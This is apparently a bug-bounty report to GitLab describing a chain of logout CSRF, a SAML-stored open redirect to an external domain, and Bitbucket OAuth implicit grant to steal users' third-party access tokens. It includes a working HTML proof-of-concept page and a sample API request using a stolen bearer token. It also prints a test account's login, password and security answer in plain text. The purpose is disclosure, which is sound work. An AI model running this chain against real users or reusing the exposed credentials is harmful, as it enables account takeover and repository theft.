Hi,
I have found an issue which can be used by an attacker to steal Bitbucket access token along with Other third party access tokens(google, salesforce etc). But the most important one is bitbucket.
gitlab.com/user/sign_in
, he is automatically sent to the redirect{F2260468}
This chain can be used to steal third party access token login with google, github, bitbucket, twitter, salesforce ....... etc
but we will focus on bitbucket for the following reason:
It has the presaved oauth scopes which is wide and also the client id is same as that of when you use the import project from bitbucket feature:
{F2260558}
Scope : (Read acccess to all data in account and some write access, projects’s wikis):
{F2260561}
similar is the case for Github, but Github doesn’t allow implicit grant.
this simply returns access token as bearer to attacker’s domain , which can be used to access full bitbucket api.
This makes both users vulnerable,:
people who chose to log in with bitbucket
people who chose other means of login, but have previously imported project from bitbucket into gitlab
make sure you have previously used bitbucket with gitlab, weather for login with bitbucket or for importing project.
Here are my credentials for triage purposes: (Please note i will revoke these credentials upon triage, let me know if you need them longer or dont need them at all)
https://bugcrowd-iambull-2.oktapreview.com/
username: [email protected]
password : Gliatb4passtbx!
security answer: Gliatb
log victim out with Logout CSRF
use SAML creds to save open redirect for victim:
token
GET /2.0/repositories/%7B766210f9-9bec-4010-9f4d-917b06661c0c%7D HTTP/2
Host: api.bitbucket.org
User-Agent: curl/7.79.1
Accept: */*
Authorization: Bearer Txpo3AXXQZHlp....
here is the poc for doing everything step by step, please note all this can be automated with window.open for 1 click exploit
<html>
<title>GitLab</title>
<body>
<span>Logout of gitlab if logged in:</span>
<form action="https://gitlab.com/users/sign_out" target="_blank" method="post"><button>Logout Gitlab Account</button></form>
<br>
<br>
<br>
<br>
<span>Open redirect via SAML:</span>
<form action="https://bugcrowd-iambull-2.oktapreview.com/app/bugcrowd-iambull-2_gitlabcom_1/exk1lit3jovMjvewh0h8/sso/saml" target="_blank" method="get">
<input type="hidden" name="RelayState" value=".witcoat.com" />
<button>Save Open Redirect</button></form>
<br>
<span>steal oauth access Token For Bitbucket:</span>
<form action="https://bitbucket.org/site/oauth2/authorize" target="_blank" method="get">
<input type="hidden" name="client_id" value="b9jLmh8WCLZPBAwWba" />
<input type="hidden" name="redirect_uri" value="https://gitlab.com/users/auth/bitbucket/callback" />
<input type="hidden" name="response_type" value="token" />
<input type="hidden" name="state" value="Doesnotmatter" />
<button>Steal Bitbucket Code</button>
</form>
</body>
</html>
here is the video of going through steps:
{F2260621}
Upon saving open redirect into the cookies, when the user clicks signin on about.gitlab.com
he will be redirected to external domain to steal credentials:
{F2260648}
Please let me know if you need any more information or if i missed something
thanks
Bull
Steal bitbucket access token, which can be used to import victim’s any repository, and also write access to victim’s any wiki in bitbucket,
also this can be used to steal access tokens for other providers such as google, salesforce twitter etc…
Also this can be used to phish users